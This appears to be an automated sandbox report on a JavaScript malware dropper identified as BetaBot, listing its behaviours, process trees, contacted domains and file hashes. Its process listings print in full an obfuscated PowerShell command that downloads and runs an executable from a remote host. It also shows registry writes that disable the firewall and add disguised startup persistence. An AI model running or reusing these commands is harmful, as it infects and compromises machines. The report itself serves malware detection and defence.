Analysis Overview
SHA256
4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264
Threat Level: Known bad
The file CFDI 1675442 76821.js was found to be: Known bad.
Malicious Activity Summary
BetaBot
Modifies firewall policy service
Executes dropped EXE
Sets file to hidden
Blocklisted process makes network request
Sets file execution options in registry
Downloads MZ/PE file
Checks BIOS information in registry
Maps connected drives based on registry
Checks whether UAC is enabled
Drops desktop.ini file(s)
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Views/modifies file attributes
Enumerates system info in registry
NTFS ADS
Modifies registry class
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer Protected Mode
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Modifies Internet Explorer Protected Mode Banner
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-06-28 16:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-06-28 16:28
Reported
2021-06-28 16:34
Platform
win7v20210408
Max time kernel
243s
Max time network
245s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1632 wrote to memory of 1376 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1632 wrote to memory of 1376 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1632 wrote to memory of 1376 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1376 wrote to memory of 1608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1376 wrote to memory of 1608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1376 wrote to memory of 1608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | saltoune.xyz | udp |
| N/A | 162.213.251.176:443 | saltoune.xyz | tcp |
Files
memory/1376-60-0x0000000000000000-mapping.dmp
memory/1608-61-0x0000000000000000-mapping.dmp
memory/1608-62-0x000007FEFC031000-0x000007FEFC033000-memory.dmp
memory/1608-63-0x00000000022F0000-0x00000000022F1000-memory.dmp
memory/1608-64-0x000000001AE20000-0x000000001AE21000-memory.dmp
memory/1608-65-0x000000001ADA0000-0x000000001ADA2000-memory.dmp
memory/1608-66-0x000000001ADA4000-0x000000001ADA6000-memory.dmp
memory/1608-67-0x0000000002330000-0x0000000002331000-memory.dmp
memory/1608-68-0x00000000024E0000-0x00000000024E1000-memory.dmp
memory/1608-69-0x000000001C270000-0x000000001C271000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-06-28 16:28
Reported
2021-06-28 16:34
Platform
win10v20210408
Max time kernel
298s
Max time network
300s
Command Line
Signatures
BetaBot
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Tempkmt12.exe | N/A |
| N/A | N/A | C:\LMPupdate\set\unpakedree.exe | N/A |
| N/A | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| N/A | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe | N/A |
Sets file execution options in registry
Sets file to hidden
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Google Updater 2.09\desktop.ini | C:\Windows\SysWOW64\explorer.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 4344 | N/A | C:\LMPupdate\set\xc829374091FD.exe | C:\LMPupdate\set\xc829374091FD.exe |
| PID 2208 set thread context of 0 | N/A | C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Tempkmt12.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78 | C:\Windows\SysWOW64\explorer.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78 | C:\Windows\SysWOW64\explorer.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| N/A | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: 33 | N/A | C:\LMPupdate\set\xc829374091FD.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
C:\Users\Admin\AppData\Local\Tempkmt12.exe
C:\Users\Admin\AppData\Local\Tempkmt12.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\183.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 0
C:\Windows\SysWOW64\PING.EXE
ping dhgfg sgudy
C:\LMPupdate\set\unpakedree.exe
"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\48551.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\LMPupdate\set"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\LMPupdate\set\xc829374091FD.exe
xc829374091FD.exe /start
C:\LMPupdate\set\xc829374091FD.exe
xc829374091FD.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im unpakedree.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im unpakedree.exe
C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 4
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe
/suac
C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe
"C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | saltoune.xyz | udp |
| N/A | 162.213.251.176:443 | saltoune.xyz | tcp |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 172.217.168.206:80 | google.com | tcp |
| N/A | 8.8.8.8:53 | russk18.icu | udp |
| N/A | 8.8.8.8:53 | russk18.icu | udp |
| N/A | 23.95.225.105:80 | russk18.icu | tcp |
| N/A | 8.8.8.8:53 | morningstarlincoln.co.uk | udp |
| N/A | 79.170.44.146:80 | morningstarlincoln.co.uk | tcp |
| N/A | 23.95.225.105:80 | russk18.icu | tcp |
| N/A | 23.95.225.105:80 | russk18.icu | tcp |
| N/A | 23.95.225.105:80 | russk18.icu | tcp |
| N/A | 23.95.225.105:80 | russk18.icu | tcp |
Files
memory/4252-114-0x0000000000000000-mapping.dmp
memory/3320-115-0x0000000000000000-mapping.dmp
memory/3320-121-0x0000024388050000-0x0000024388051000-memory.dmp
memory/3320-124-0x0000024386630000-0x0000024386632000-memory.dmp
memory/3320-125-0x0000024386633000-0x0000024386635000-memory.dmp
memory/3320-130-0x00000243A26A0000-0x00000243A26A1000-memory.dmp
memory/3320-135-0x0000024386636000-0x0000024386638000-memory.dmp
memory/1208-137-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Tempkmt12.exe
| MD5 | 808e34a763acd79d01eeb1f54b18a551 |
| SHA1 | df3f6e0f29d9d65a2afc401ab6938044f24c5506 |
| SHA256 | 86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595 |
| SHA512 | 9638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c |
memory/1208-139-0x00000000008A0000-0x00000000008A1000-memory.dmp
C:\Users\Admin\AppData\Local\Tempkmt12.exe
| MD5 | 808e34a763acd79d01eeb1f54b18a551 |
| SHA1 | df3f6e0f29d9d65a2afc401ab6938044f24c5506 |
| SHA256 | 86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595 |
| SHA512 | 9638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c |
memory/1220-141-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\435246.vbs
| MD5 | f6e0c73782e7a0768006b7be0fc4a1a1 |
| SHA1 | 2a5dea82a47544d00bfa99563fb899a41fa7a1f7 |
| SHA256 | 8c968d170289989dcca0c9bb5f2381dd6e38c3cfb6a324e80dbb6e556e6c5317 |
| SHA512 | 89827dcd80d9b5c2eedf18996a882feda400036df0b9691fc30701265f11528b0ab312dc69246f56e0388f75d2fa394329f502f9f796cbec702cd1dbfa9f2703 |
C:\LMPupdate\set\183.bat
| MD5 | 49d00501554543d18a49c5b93c4528f0 |
| SHA1 | 7a73595e37fda30fb1554b9d8bfe8a855f803d0b |
| SHA256 | 74560d7c92a3cb7c3782e59fb45bd5a9b1a77a619fad985c4d5bdd17a48c2735 |
| SHA512 | 9c6c296b4bd21de5d13dc56dc92eab363bbd982335858a09537a34f2394be5632d34e002dfa73e312f685f45126c3d5d497a3d7c4553c46bcf4b8c65c4178fb6 |
memory/1580-144-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\x0329847998
| MD5 | a5a4cc669d306e9b25ae2202e1ccc565 |
| SHA1 | 4e8e841ba4915641f989a061f092f95f9070d164 |
| SHA256 | 3da185d70e391a0449a2e86823e181ca35f5356306a856701ec92cfee639c705 |
| SHA512 | 5398c3722d4c6119d9a033558ca6fe0d57735b8259b4907cf1844ba2921e48ffad1ae9f1dcc760158857c6fb13572cb4dd897ee6f6c260efce247b2b793b0216 |
memory/1860-146-0x0000000000000000-mapping.dmp
memory/1528-147-0x0000000000000000-mapping.dmp
memory/2304-148-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\unpakedree.exe
| MD5 | 397a93800d56a2308bffc872d4a08032 |
| SHA1 | 6f5334d51195a521e8a03f0e05ac777b96c77bc4 |
| SHA256 | efe3abcfde6e9846a99049a68e6a38d0bc42baa3ac1cf6f236c894abef0a7720 |
| SHA512 | 7fc7b6c8ffe640295085cab4e56ba4c3eea9738a2c9fa27d1032fd60bb3a638e93cd2522058b6212dd7237366510a83c7d1d9b3cbd5f9712852c72959ace53eb |
memory/2516-150-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\3980392CV.vbs
| MD5 | 0c4747ed40d52d992d44951de476c21b |
| SHA1 | 24cc5271d1a379e0ebdd0814a1148ecd6e7c880a |
| SHA256 | 3c01bb32fd4de8574e37cb8293e61d869b8f5bbec69f3cb882a17d5d285b3264 |
| SHA512 | 6e7a264c288c8939c5d8f482229c92915a9bef427b5b1b1df8d942ffded006feba548acfa08588327587f34928acb0912d6f464536f5beb8027b78def01cffe1 |
memory/2704-152-0x0000000000000000-mapping.dmp
memory/3004-153-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\48551.bat
| MD5 | ec8f0f76fe14a110317c3b5c71fce669 |
| SHA1 | d41207a90b96b124630f3f8ad7f1657cd39a4dd2 |
| SHA256 | 1447333e356ed3c1c5183ebef48730c370429c40137c2255585a1d3ba2a37614 |
| SHA512 | 9e78bf61280430edbc2ed2c5869acc2cde3e92f236f2eabf83f715a0d6fbc3a79a420c94364cdf4863dd5ca68e4b0109eefb34f7571c5acdc14944eaebdf8b1f |
memory/3180-155-0x0000000000000000-mapping.dmp
memory/4072-156-0x0000000000000000-mapping.dmp
memory/4292-157-0x0000000000000000-mapping.dmp
memory/3472-158-0x0000000000000000-mapping.dmp
C:\LMPupdate\set\xc829374091FD.exe
| MD5 | a8d1d7e6c60c73faf55d64e724e97aa7 |
| SHA1 | 9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687 |
| SHA256 | 5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122 |
| SHA512 | 237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1 |
C:\LMPupdate\set\xc829374091FD.exe
| MD5 | a8d1d7e6c60c73faf55d64e724e97aa7 |
| SHA1 | 9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687 |
| SHA256 | 5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122 |
| SHA512 | 237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1 |
memory/4344-161-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4344-162-0x00000000004015C6-mapping.dmp
C:\LMPupdate\set\xc829374091FD.exe
| MD5 | a8d1d7e6c60c73faf55d64e724e97aa7 |
| SHA1 | 9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687 |
| SHA256 | 5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122 |
| SHA512 | 237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1 |
memory/4372-164-0x0000000000000000-mapping.dmp
memory/4344-165-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4404-166-0x0000000000000000-mapping.dmp
memory/4600-167-0x0000000000000000-mapping.dmp
memory/4236-168-0x0000000000000000-mapping.dmp
memory/4344-170-0x0000000000440000-0x00000000004EE000-memory.dmp
memory/4344-171-0x0000000002630000-0x0000000002631000-memory.dmp
memory/4344-172-0x0000000002660000-0x000000000266C000-memory.dmp
memory/4344-169-0x0000000000970000-0x00000000009D6000-memory.dmp
memory/4612-173-0x0000000000000000-mapping.dmp
memory/4612-175-0x0000000000B90000-0x0000000000CCE000-memory.dmp
memory/4612-176-0x00000000033C0000-0x00000000033CD000-memory.dmp
memory/4612-174-0x0000000000DD0000-0x000000000120F000-memory.dmp
memory/4344-179-0x0000000002650000-0x0000000002651000-memory.dmp
C:\LMPupdate\set\unpakedree.exe
| MD5 | 397a93800d56a2308bffc872d4a08032 |
| SHA1 | 6f5334d51195a521e8a03f0e05ac777b96c77bc4 |
